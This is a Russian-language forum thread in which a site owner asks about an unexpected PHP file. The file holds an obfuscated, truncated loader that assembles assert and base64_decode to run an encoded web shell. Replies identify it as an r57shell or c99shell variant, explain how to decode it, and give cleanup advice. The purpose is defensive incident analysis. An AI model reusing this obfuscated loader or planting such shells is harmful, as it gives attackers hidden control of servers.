В одном из наших каталогов обнаружен странный файл, который мы не создавали.
Он назывался ".moreinfoege.php.KJt". В каталоге у нас также был файл с именем moreinfo.php
В последнее время у нас возникли проблемы с сервером (взлом WordPress, DDoS-атака), поэтому мы находимся в режиме повышенной готовности к другим заражениям. Это взлом? Каким образом это могло попасть?
Вот как выглядело его содержимое (длинная бессмысленная строка, сокращенная, чтобы поместиться здесь):
<?php $IRdphe='as';$lgOULt='e';$UXkpWY=$IRdphe.'s'.$lgOULt.'r'.'t';$kOUHAp='b'.$IRdphe.$lgOULt.(64).'_'.'d'.$lgOULt.'c'.'o'.'d'.$lgOULt;@$UXkpWY(@$kOUHAp('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiNWIzcGVsczNzaTc4TzNtZTNNUHlNcnNwZFNocXNHekhsRVVQa3B6NHRHeTVMYVhUT1pJUFEzR1EyT0xVSEN3NzNqblgvcjF2VlFFTElCYzEyRW4zMmZ2eklKRVlDb1ZDb1ZBb0ZBcWQ5bEpuUEc1TmxncTF0M3QvKzNIdjhPaTQrT3JYUnJ2MTl1Zk85NzNpdStYbFQxK1BXK054WjlDdmpTZjEwV1JwZWV2clRudXAxN3lQS204T1dQNm9jL2pYNGNIYlYyYy9vdnoyZHZGQi9XSDkvb1BUK3c4ZWJkNXJ0dGVhemMzNzdYWmpyZG5ZYkt6Zng0L2k4dGVmQ3JYRHZjUERsd2V2ajR0L3ZmaGYzYmQvTzJ0L2VOYi82ZS9EOFVIenhmOCtQVy84OEhxMGU3Zy8yWnYrV255M3ZiNzFHeHU5YzZ0YXdIdzQ2dlFuU2ZxNDJYbWZqQ2NmdTYzdDRuQXc3a3pRbTByOWREem9UaWV0clc2 [...] lY1V281TlEvZUhIMDB6Tld4L0hmb1RTTjg1d0liV3VKVWJPazFCdGNOOGtyOE9iZzdSSGZFWkFyUjRZenFCYnlSTHJGVTUrdDMvNC8iKSkpOw==')); ?>
Код скрывает тот факт, что он делает assert(base64_decode( текста от 'ZXZ до W =='.
Декодирование этого текста показывает другие строки, которые выполняют другое декодирование и распаковку, начиная с eval(gzinflate(base64_decode("5b3pe...
Без опубликованного полного кода я не вижу, что находится в конце кроличьей норы. Вы можете использовать этот сайт для декодирования каждого шага:
http://www.webutils.pl/index.php?idx=base64 (ПРИМЕЧАНИЕ: текст помещается в синее поле.)
Эта ссылка должна помочь во второй части: http://www.tareeinternet.com/scripts/decrypt.php
ОБНОВИТЬ: Судя по всему файлу, это вариант r57shell или c99shell. Он предоставляет веб-интерфейс вашему серверу для таких вещей, как выполнение операций из командной строки и взаимодействие с данными SQL.
На этом сайте есть пример того, как это выглядит: http://phpsecurity.wordpress.com/2007/11/08/what-does-a-phpshell-look-like/
На этом сайте есть запись в блоге человека, у которого тоже была проблема: http://basus.net/?p=19
Похоже, что PHP закодирован в кодировке base64, чтобы усложнить понимание того, что происходит, но это трудно сказать без доступа к обоим рассматриваемым файлам. Я готов поспорить с большим количеством шоколада, что ваш хозяин все еще скомпрометирован.
В зависимости от того, какой доступ злоумышленникам удалось получить ранее и как вы восстановили его, могут остаться методы доступа.
Я рекомендую вам начать процедуру восстановления - установить новую ОС и восстановить свой сайт из заведомо исправной копии.
похоже на взлом. один из популярных в последнее время способов получить файлы такого типа - через ftp.
существует множество троянов, собирающих пароли от популярных ftp-клиентов Windows [например, Total Commander]. учетные данные передаются в управляющие узлы, которые либо напрямую, либо с других зараженных машин добавляют вредоносный код js / php в индексный файл, загружают вредоносные файлы .htaccess и т. д.
проверьте дату создания файла, попробуйте поговорить со своим хостинг-провайдером, чтобы получить логи ftp примерно в то время, когда этот файл был загружен.
на всякий случай ... - если это wordpress - резервные копии данных и кода; удалите все файлы php, просмотрите все шаблоны, восстановите приложение из свежей версии.